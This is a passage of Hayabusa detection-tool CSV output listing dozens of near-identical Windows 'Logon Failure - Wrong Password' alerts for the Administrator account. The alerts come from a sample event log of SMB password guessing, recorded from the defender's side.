NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJifU0PnO1Ntp6z3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGKdKjJy28Qd1whT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3L4BYjYJYlvuYHE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ui5RoLKttDo0wfFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G2xjdWobsxBjo6p7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: TPeQ0M5lXITI84G3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uu72qx4lG5ZRM7xf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zD072YR1hIgbzjaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqA7HDvImIlCiFq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: efYFxZwMGEC3vVi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6WmMHYegvFJvv6zd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DS9WkRnP0B5MgaeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5jNPV7ZgFExgg9n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1FJ6vm3wK97iual | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLuIx0sfF8NQD8QY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y3lMvcrrmGTkjdlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZqOabcNMeazs6TC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2AbE9D8PvuFDBz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzWdLEEc68ZvviGh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtV3BuZiljbAeikO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnKKfcwikNDdYOam | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jSbbzD7fpJY4Q1JL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: gOASpLLE25ruCnGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jhUGOtszbPUwccL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yB8Mzo1RppdpLFKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOwoUlHGVeSbAhuN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BXIEHbkrjwedeaih | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OvsKoixgEzUgAyie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TzaZe6Y4Tdfjseuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEmbuU3CAC3CecZy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kfBmqmVPd0CGVUsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Uz3TlU6yrcveM1w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z6hH6AkkgBFmeZ6u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2J1W2WhA6Pj7j5j | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: soHOxnkoOn7ot0My | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4c2oWI6mRIvSVSKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKsXD8aTyaC4fBqq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrzji5ucmutsZNpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BApOU105FCLwj4zn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: EO50f7NfrrdwwCNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PfTYbWC8IjW87th8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wLnE6zm5US4maK04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AV7taC7hYQdVjAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8MnnaSRs0bnYVlMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YgqavZ1SuNvX7RgH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IQvoIsfW0LhDit2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 33IPGQXc1MarY30J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: II4Ly9LnkWlq60Ux | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wncfJC7kDSI7O9Ud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6XzbWef3PuzQK3FJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M5670HdNC6c8O56 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ea8FcddgLyV5o6oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjyhmKFdBNrHIvTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PIF47pEWBMp6Nbym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6TO891WvJPkdjsct | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6cLnJYpHEzGAvhWG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: gy6cFTrwrpRQFxfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gxz612Z88PMCKzAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GSPC8hibdZdyOcex | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6vlmykLeFmuhn81B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w4lEW9w53zMFPcc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jt2lDRFWwi6adwlB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G9MGvle35u5OGB5o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJgLFM2vrnKuj5N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8HRyDAzwKj9bfnA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J65LcwnRgEob9wjY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhas9e1fwDZ1Fxvt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5qJRSpjS6tZJjNQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bo4HAgP2tw0GmZ4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zv0cbLCD7E05i0g5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FIKsQLk5iPyKoeqM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RiHAaBszJBGe2deQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8em4eOiqze683Cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
